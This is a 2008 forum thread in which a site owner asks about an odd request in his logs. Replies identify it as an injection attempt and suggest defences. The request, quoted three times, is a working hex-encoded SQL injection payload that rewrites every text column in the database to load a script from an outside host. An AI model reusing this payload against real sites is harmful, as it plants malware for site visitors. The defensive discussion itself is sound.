WTF is going on in my logs?

DewChugr · Aug 22, 2008

I was looking through my logs today and I see these odd URL requests. They are showing up coming from different ip numbers including google media partners. The requests all have a blank referrer. and load the page, but what the hell is up with this? My google ads pass this along, is someone trying to jack my adsense?

How do I stop this if it is coming from different ip numbers?

Sample request. It looks like the hex stuff is the same all of the time. Can I decode this shit? Why does google media crawl this?

Code:

/dir/page?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

xmcp123 · Aug 22, 2008

DewChugr said:

I was looking through my logs today and I see these odd URL requests. They are showing up coming from different ip numbers including google media partners. The requests all have a blank referrer. and load the page, but what the hell is up with this? My google ads pass this along, is someone trying to jack my adsense?

How do I stop this if it is coming from different ip numbers?

Sample request. It looks like the hex stuff is the same all of the time. Can I decode this shit? Why does google media crawl this?

Code:

/dir/page?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

Are you sure it's google media crawl? What's one of the IPs doing this?

DewChugr · Aug 22, 2008

Pretty sure, whois on 66.249.67.220 comes up as google.

Mediapartners-Google crawl-66-249-67-220.googlebot.com

The other ip numbers are not google.

xmcp123 said:
Are you sure it's google media crawl? What's one of the IPs doing this?

bb_wolfe · Aug 22, 2008

DewChugr said:

I was looking through my logs today and I see these odd URL requests. They are showing up coming from different ip numbers including google media partners. The requests all have a blank referrer. and load the page, but what the hell is up with this? My google ads pass this along, is someone trying to jack my adsense?

How do I stop this if it is coming from different ip numbers?

Sample request. It looks like the hex stuff is the same all of the time. Can I decode this shit? Why does google media crawl this?

Code:

/dir/page?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

Looks like an injection attempt. Clean up your form submit code if you haven't already, they're trying to 'get in'.

Also, compare backups of DBs with what's there currently and make sure no one actually hit you.

DewChugr · Aug 22, 2008

I thinkn I might have gotten crawled by google because it looks like my google ads are passing this along.

DewChugr · Aug 22, 2008

bb_wolfe said:
Looks like an injection attempt. Clean up your form submit code if you haven't already, they're trying to 'get in'.

Also, compare backups of DBs with what's there currently and make sure no one actually hit you.

That makes sense now that I think about it.

I think my code was good, didn't see any DB irregularities. Did modify my code to 404 requests that were like these and some others. I also banned all of the ip numbers that used this that were from asia.

Thanks for the help guys.

Search

Search

WTF is going on in my logs?

DewChugr

Photoshop God

xmcp123

New member

DewChugr

Photoshop God

bb_wolfe

Medicinal KFC

DewChugr

Photoshop God

DewChugr

Photoshop God